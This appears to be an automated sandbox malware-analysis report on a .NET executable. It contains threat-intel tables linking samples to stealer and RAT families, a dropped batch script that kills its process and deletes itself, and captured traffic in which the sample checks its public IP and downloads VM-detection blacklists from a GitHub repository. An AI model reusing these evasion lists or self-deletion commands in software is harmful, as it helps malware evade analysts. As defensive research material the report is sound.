	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	AWB8674109965.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
AMAZON-AESUS	http://comgeotetra.sytes.net	Get hash	malicious	HTMLPhisher	Browse	3.220.53.221
	botx.mips.elf	Get hash	malicious	Mirai	Browse	52.5.93.77
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	52.20.41.38
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	3.210.246.148
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	18.208.8.205
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	50.17.0.11
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	18.213.123.165
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	18.208.8.205
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	18.208.8.205
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	44.219.138.3
CLOUDFLARENETUS	https://docs.zoom.us/doc/nOwDrP_BRFeNjNel8fAbXg	Get hash	malicious	Unknown	Browse	104.18.95.41
	LBswoftSFF.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	3lpDhNtVKt.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	dAkpFjNw3j.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	http://comgeotetra.sytes.net	Get hash	malicious	HTMLPhisher	Browse	104.19.229.21
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	104.16.185.241
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	104.21.16.9
	https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.html	Get hash	malicious	Unknown	Browse	172.67.210.98

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	cY6HT7CeBF.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244
	lka01EskGw.exe	Get hash	malicious	Unknown	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244
	ELsb0Wg55V.exe	Get hash	malicious	DcRat	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244
	lka01EskGw.exe	Get hash	malicious	Unknown	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244
	Q99RpE5n5f.exe	Get hash	malicious	Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244
	KaLWoqEX0y.exe	Get hash	malicious	Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244
	Q99RpE5n5f.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244
	KaLWoqEX0y.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 44.208.10.127 31.14.70.244

Process:	C:\Users\user\Desktop\yv7QsAR49V.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.387523405293235
Encrypted:	false
SSDEEP:	3:HFTulK1shFn4vq9L2STtv/K025Paa4E2J5xAIKw4HoFtK92HHKyn:sgJvq9L2SZX2Pv23fKl52Dn
MD5:	C7846001400A1FA047008327B7B3420F
SHA1:	2526194BE5BA0B358D476322CDC3EFFD18AFE826
SHA-256:	C3555B759B31016BB7EB5C96055A5E871E751F63EA53651E81BB0FA986F220FE
SHA-512:	D60990779A8500F5858EEC4B826CEA0596E77FA5D9588330413F6DCC2BA7DD0B0DB0A52783B75518A5182E51B0A0227141943B0E25E9BD356C0D99E48797F7A4
Malicious:	false
Preview:	chcp 65001..taskkill /F /PID 7052..timeout /T 2 /NOBREAK > NUL..del /F /Q "C:\Users\user\AppData\Local\Temp\4d347f08-badb-4aa2-85cc-e67036e9d72f.bat"..

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.5991860770036785
Encrypted:	false
SSDEEP:	3:hYF8AgARcWmFsFJQZaVy:hYF/mFSQZas
MD5:	471500D11DAF370CB75C597A4B1A7654
SHA1:	1AC2D4BDA1A30E09287F680C2AD75C577B096898
SHA-256:	C751BAFF37E4DC361F2C77BCC6B356159CC6178D1642244CBCD764A8DDE409B9
SHA-512:	DB81C5CE33D78E5618F41738129B5E623300CEFF188D99E7173E4E524107EEDED4C3BE2F15AC4715D3D10EAC23E39841978BBD42326E5C4E016A2B938C37A855
Malicious:	false
Preview:	..Waiting for 2 seconds, press CTRL+C to quit ....1.0..

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.975072144677949
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	yv7QsAR49V.exe
File size:	3'746'816 bytes
MD5:	03a0e76a8c671d5d10caf9b73f17c2bb
SHA1:	7e426796a6a12dce6a30e6dd337974ca097c627d
SHA256:	0adf1cfd118c89091ddd89493989c01348ad74ee8e25c71f4a30c3400e511102
SHA512:	09009776ed9cfd0840026dd52bd1e24a5a13fc8cdc876365cf6e2b5881ec663016d27d96db6727b22b66e1db1c9624b94084ff0deeb8fb562d900171e3aff2d4
SSDEEP:	98304:QkqXf0FdnlnrYYesDi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13:QkSIdnVbesRAkuujCPX9YG9he5GnQCAo
TLSH:	4806235033F84659E1FF5FB8A97162109F3779179836D64C1998108C0EB2B84EE62FBB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...q............."...0...9.............. ....@...... .......................`9...........`...@......@............... .....

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBC98A971 [Mon Apr 7 18:37:37 2070 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x394000	0x1223	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x391498	0x391600	5e40efddfbe612071e5ef2c86a7bf8f6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x394000	0x1223	0x1400	7f6226a0696fa64afb6759e87e6049ca	False	0.3564453125	data	4.8310260050565885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x3940a0	0x348	data			0.43214285714285716
RT_MANIFEST	0x3943e8	0xe3b	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.38649464726873456

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 12:18:33.522866011 CET	54236	53	192.168.2.12	1.1.1.1
Nov 29, 2024 12:18:33.662523985 CET	53	54236	1.1.1.1	192.168.2.12
Nov 29, 2024 12:18:35.653512001 CET	52661	53	192.168.2.12	1.1.1.1
Nov 29, 2024 12:18:35.794639111 CET	53	52661	1.1.1.1	192.168.2.12
Nov 29, 2024 12:18:39.204875946 CET	61477	53	192.168.2.12	1.1.1.1
Nov 29, 2024 12:18:39.351389885 CET	53	61477	1.1.1.1	192.168.2.12
Nov 29, 2024 12:18:42.644118071 CET	52167	53	192.168.2.12	1.1.1.1
Nov 29, 2024 12:18:42.784904957 CET	53	52167	1.1.1.1	192.168.2.12
Nov 29, 2024 12:18:42.812912941 CET	56959	53	192.168.2.12	1.1.1.1
Nov 29, 2024 12:18:42.955941916 CET	53	56959	1.1.1.1	192.168.2.12
Nov 29, 2024 12:18:46.467235088 CET	61498	53	192.168.2.12	1.1.1.1
Nov 29, 2024 12:18:46.607893944 CET	53	61498	1.1.1.1	192.168.2.12
Nov 29, 2024 12:18:48.938694954 CET	50472	53	192.168.2.12	1.1.1.1
Nov 29, 2024 12:18:49.190294981 CET	53	50472	1.1.1.1	192.168.2.12
Nov 29, 2024 12:18:53.035010099 CET	58383	53	192.168.2.12	1.1.1.1
Nov 29, 2024 12:18:53.174587965 CET	53	58383	1.1.1.1	192.168.2.12
Nov 29, 2024 12:18:56.930768967 CET	62200	53	192.168.2.12	1.1.1.1
Nov 29, 2024 12:18:57.400911093 CET	53	62200	1.1.1.1	192.168.2.12

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 12:18:43.077610970 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Nov 29, 2024 12:18:44.217437029 CET	535	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:18:44 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=97DmmMt8CnH3MtvFxz988EuPLBderxNnxjOLNChkT70-1732879124-1.0.1.1-Sz5twdIGK6b_6q_LHIcMMuC9K85Iw_fwpX8AgRQFA4EWmJEVmeZ3KQSS64mhwOeaG_eJ78kQCadPvKWEZ0Q8Sw; path=/; expires=Fri, 29-Nov-24 11:48:44 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ea232dd4e017c8e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: 8.46.123.228

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 12:18:46.156610012 CET	39	OUT	GET / HTTP/1.1 Host: icanhazip.com
Nov 29, 2024 12:18:47.295135021 CET	535	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:18:47 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=Yf6lr8PshOwdhD.ue0BhwEFBnb288myH9iHumZRsi3M-1732879127-1.0.1.1-yRmrOQ_yv8Z1FNBDXDSs0rUL3Bw9hoZ.Q54L5J1MWBN.Vb9daERLtnzSy1SDXv8tq43Z1Xo1JFkaA5IFgoyT4Q; path=/; expires=Fri, 29-Nov-24 11:48:47 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ea232f07f518c6b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: 8.46.123.228

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 12:18:53.306946039 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Nov 29, 2024 12:18:54.496431112 CET	535	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:18:54 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=mK2rQaljwMKAQJ_X2jvLNeb2hwXiCFHvYMFJ8geli14-1732879134-1.0.1.1-2RcBsCpdWBngt8EJksYHEpzQj64AcIbutz6tCv1.iON88nv51uoZLRmU7XCXdx979i1QlyN6OBmRznLa1V8Gag; path=/; expires=Fri, 29-Nov-24 11:48:54 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ea2331d7ce2439d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: 8.46.123.228

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:35 UTC	120	OUT	GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:18:35 UTC	898	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1246 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "30981a4a96ce3533cb33ae7620077db7a4a8377cb1ef8fcfc8a07293fa2937d6" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 7E09:1CF27F:96EA1:A565C:67498FF6 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:18:35 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740033-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1732879115.309069,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 7db3b45f7304ab252d4a9582ae0e178411962b86 Expires: Fri, 29 Nov 2024 11:23:35 GMT Source-Age: 115
2024-11-29 11:18:35 UTC	1246	IN	Data Raw: 32 39 5f 5f 48 45 52 45 0a 32 47 36 43 37 5a 36 31 0a 32 52 4f 5f 38 55 56 55 0a 32 53 4e 35 33 38 4b 34 0a 35 4b 42 4b 34 31 5f 4c 0a 35 4c 58 50 41 38 45 53 0a 35 50 45 43 4e 36 4c 31 0a 35 52 50 46 54 33 48 5a 0a 36 42 4f 53 34 4f 37 55 0a 36 42 5a 50 32 59 32 5f 0a 36 46 34 34 41 44 52 37 0a 36 4d 50 41 39 33 0a 37 32 32 39 48 39 47 39 0a 37 34 5a 5a 43 59 37 41 0a 37 54 42 39 47 36 50 37 0a 38 34 4b 44 31 4b 53 4b 0a 38 4e 59 47 4b 33 46 4c 0a 38 59 33 42 53 58 4b 47 0a 39 53 46 37 32 46 47 37 0a 39 5a 37 37 44 4e 34 54 0a 5f 47 33 31 45 34 36 4e 0a 5f 50 48 4c 4e 59 47 52 0a 5f 54 39 57 35 4c 48 4f 0a 41 46 52 42 52 36 54 43 0a 41 4d 44 20 52 61 64 65 6f 6e 20 48 44 20 38 36 35 30 47 0a 41 53 50 45 45 44 20 47 72 61 70 68 69 63 73 20 46 61 6d 69 6c Data Ascii: 29__HERE2G6C7Z612RO_8UVU2SN538K45KBK41_L5LXPA8ES5PECN6L15RPFT3HZ6BOS4O7U6BZP2Y2_6F44ADR76MPA937229H9G974ZZCY7A7TB9G6P784KD1KSK8NYGK3FL8Y3BSXKG9SF72FG79Z77DN4T_G31E46N_PHLNYGR_T9W5LHOAFRBR6TCAMD Radeon HD 8650GASPEED Graphics Famil

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:35 UTC	119	OUT	GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:18:35 UTC	898	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2853 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: DDA6:287308:A00E2:AE8A6:67498FF6 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:18:35 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740027-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1732879115.310121,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 73c48dc6951ff56d6fb064bb9ca9074f839a906f Expires: Fri, 29 Nov 2024 11:23:35 GMT Source-Age: 210
2024-11-29 11:18:35 UTC	1378	IN	Data Raw: 31 30 2e 32 30 30 2e 31 36 39 2e 32 30 34 0a 31 30 34 2e 31 39 38 2e 31 35 35 2e 31 37 33 0a 31 30 34 2e 32 30 30 2e 31 35 31 2e 33 35 0a 31 30 39 2e 31 34 35 2e 31 37 33 2e 31 36 39 0a 31 30 39 2e 32 32 36 2e 33 37 2e 31 37 32 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 30 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 31 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 32 0a 31 34 30 2e 32 32 38 2e 32 31 2e 33 36 0a 31 34 39 2e 38 38 2e 31 31 31 2e 37 39 0a 31 35 34 2e 36 31 2e 37 31 2e 35 30 0a 31 35 34 2e 36 31 2e 37 31 2e 35 31 0a 31 37 32 2e 31 30 35 2e 38 39 2e 32 30 32 0a 31 37 34 2e 37 2e 33 32 2e 31 39 39 0a 31 37 36 2e 36 33 2e 34 2e 31 37 39 0a 31 37 38 2e 32 33 39 2e 31 36 35 2e 37 30 0a 31 38 31 2e 32 31 34 2e 31 35 33 2e 31 31 0a 31 38 35 2e 32 32 30 2e 31 30 31 Data Ascii: 10.200.169.204104.198.155.173104.200.151.35109.145.173.169109.226.37.172109.74.154.90109.74.154.91109.74.154.92140.228.21.36149.88.111.79154.61.71.50154.61.71.51172.105.89.202174.7.32.199176.63.4.179178.239.165.70181.214.153.11185.220.101
2024-11-29 11:18:35 UTC	1378	IN	Data Raw: 30 2e 31 31 38 0a 32 31 33 2e 33 33 2e 31 39 30 2e 31 37 31 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 37 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 33 35 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 36 0a 32 31 33 2e 33 33 2e 31 39 30 2e 36 39 0a 32 31 33 2e 33 33 2e 31 39 30 2e 37 34 0a 32 33 2e 31 32 38 2e 32 34 38 2e 34 36 0a 33 34 2e 31 30 35 2e 30 2e 32 37 0a 33 34 2e 31 30 35 2e 31 38 33 2e 36 38 0a 33 34 2e 31 30 35 2e 37 32 2e 32 34 31 0a 33 34 2e 31 33 38 2e 32 35 35 2e 31 30 34 0a 33 34 2e 31 33 38 2e 39 36 2e 32 33 0a 33 34 2e 31 34 31 2e 31 34 36 2e 31 31 34 0a 33 34 2e 31 34 31 2e 32 34 35 2e 32 35 0a 33 34 2e 31 34 32 2e 37 34 Data Ascii: 0.118213.33.190.171213.33.190.22213.33.190.227213.33.190.242213.33.190.35213.33.190.42213.33.190.46213.33.190.69213.33.190.7423.128.248.4634.105.0.2734.105.183.6834.105.72.24134.138.255.10434.138.96.2334.141.146.11434.141.245.2534.142.74
2024-11-29 11:18:35 UTC	97	IN	Data Raw: 35 2e 37 31 2e 36 35 0a 39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37 31 2e 38 30 0a 39 35 2e 32 35 2e 37 31 2e 38 36 0a 39 35 2e 32 35 2e 37 31 2e 38 37 0a 39 35 2e 32 35 2e 37 31 2e 38 39 0a 39 35 2e 32 35 2e 37 31 2e 39 32 0a 39 35 2e 32 35 2e 38 31 2e 32 34 0a 4e 6f 6e 65 0a Data Ascii: 5.71.6595.25.71.7095.25.71.8095.25.71.8695.25.71.8795.25.71.8995.25.71.9295.25.81.24None

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:35 UTC	128	OUT	GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:18:35 UTC	898	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1275 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "bbf75a064e165fba2b8fcc6595e496788fe27c3185ffa2fa56d3479e12867693" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: E854:128C4E:AEAFA:BD2CE:67498FF8 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:18:35 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740047-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1732879115.266351,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 7beeb0eec7439e9cb8472aec445e345ec922befb Expires: Fri, 29 Nov 2024 11:23:35 GMT Source-Age: 217
2024-11-29 11:18:35 UTC	1275	IN	Data Raw: 30 35 68 30 30 47 69 30 0a 30 35 4b 76 41 55 51 4b 50 51 0a 32 31 7a 4c 75 63 55 6e 66 49 38 35 0a 33 75 32 76 39 6d 38 0a 34 33 42 79 34 0a 34 74 67 69 69 7a 73 4c 69 6d 53 0a 35 73 49 42 4b 0a 35 59 33 79 37 33 0a 67 72 65 70 65 74 65 0a 36 34 46 32 74 4b 49 71 4f 35 0a 36 4f 34 4b 79 48 68 4a 58 42 69 52 0a 37 44 42 67 64 78 75 0a 37 77 6a 6c 47 58 37 50 6a 6c 57 34 0a 38 4c 6e 66 41 61 69 39 51 64 4a 52 0a 38 4e 6c 30 43 6f 6c 4e 51 35 62 71 0a 38 56 69 7a 53 4d 0a 39 79 6a 43 50 73 45 59 49 4d 48 0a 41 62 62 79 0a 61 63 6f 78 0a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 0a 41 6d 79 0a 61 6e 64 72 65 61 0a 41 70 70 4f 6e 46 6c 79 53 75 70 70 6f 72 74 0a 41 53 50 4e 45 54 0a 61 7a 75 72 65 0a 62 61 72 62 61 72 72 61 79 0a 62 65 6e 6a 61 68 0a 42 72 75 6e Data Ascii: 05h00Gi005KvAUQKPQ21zLucUnfI853u2v9m843By44tgiizsLimS5sIBK5Y3y73grepete64F2tKIqO56O4KyHhJXBiR7DBgdxu7wjlGX7PjlW48LnfAai9QdJR8Nl0ColNQ5bq8VizSM9yjCPsEYIMHAbbyacoxAdministratorAmyandreaAppOnFlySupportASPNETazurebarbarraybenjahBrun

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:35 UTC	125	OUT	GET /6nz/virustotal-vm-blacklist/main/services_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:18:35 UTC	899	IN	HTTP/1.1 200 OK Connection: close Content-Length: 101 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "0bcf2aa1d6fd4fa9b568734e0ed0859da01bebef24f1892eae4c51529b34682e" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 93D2:35CF0B:344D10:39C25C:6749A309 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:18:35 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740041-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1732879115.308641,VS0,VE69 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 6d8c71592e1235f1f90c1d91fe590b2fd40da5d6 Expires: Fri, 29 Nov 2024 11:23:35 GMT Source-Age: 0
2024-11-29 11:18:35 UTC	101	IN	Data Raw: 76 6d 69 63 68 65 61 72 74 62 65 61 74 0a 76 6d 69 63 6b 76 70 65 78 63 68 61 6e 67 65 0a 76 6d 69 63 72 64 76 0a 76 6d 69 63 73 68 75 74 64 6f 77 6e 0a 76 6d 69 63 74 69 6d 65 73 79 6e 63 0a 76 6d 69 63 76 73 73 0a 56 6d 52 65 6d 6f 74 65 53 65 72 76 69 63 65 0a 56 53 53 0a 53 79 73 6d 6f 6e 36 34 0a Data Ascii: vmicheartbeatvmickvpexchangevmicrdvvmicshutdownvmictimesyncvmicvssVmRemoteServiceVSSSysmon64

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:35 UTC	126	OUT	GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:18:35 UTC	896	IN	HTTP/1.1 200 OK Connection: close Content-Length: 31 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "b8ccbe01df84b6df59046ff7ef97fe02bbba9374a7a63f24d1c8a0b07083adca" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: F0F4:35108B:983CD:A6B92:67498FF6 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:18:35 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740032-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1732879115.319081,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: a89db479dc84ac83e6bfa3205a48040cd3cb377f Expires: Fri, 29 Nov 2024 11:23:35 GMT Source-Age: 217
2024-11-29 11:18:35 UTC	31	IN	Data Raw: 56 6d 52 65 6d 6f 74 65 47 75 65 73 74 2e 65 78 65 0a 53 79 73 6d 6f 6e 36 34 2e 65 78 65 0a Data Ascii: VmRemoteGuest.exeSysmon64.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:35 UTC	123	OUT	GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:18:35 UTC	898	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1110 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "1224175461dce581d971884e2b8af67d12f105702cbcc56be1043ccc84319e42" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: AD0E:370AE7:92613:A0DDF:67498FF8 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:18:35 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740071-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1732879115.362428,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 7c558fce216466ae0986629962c1ba825fe84e15 Expires: Fri, 29 Nov 2024 11:23:35 GMT Source-Age: 210
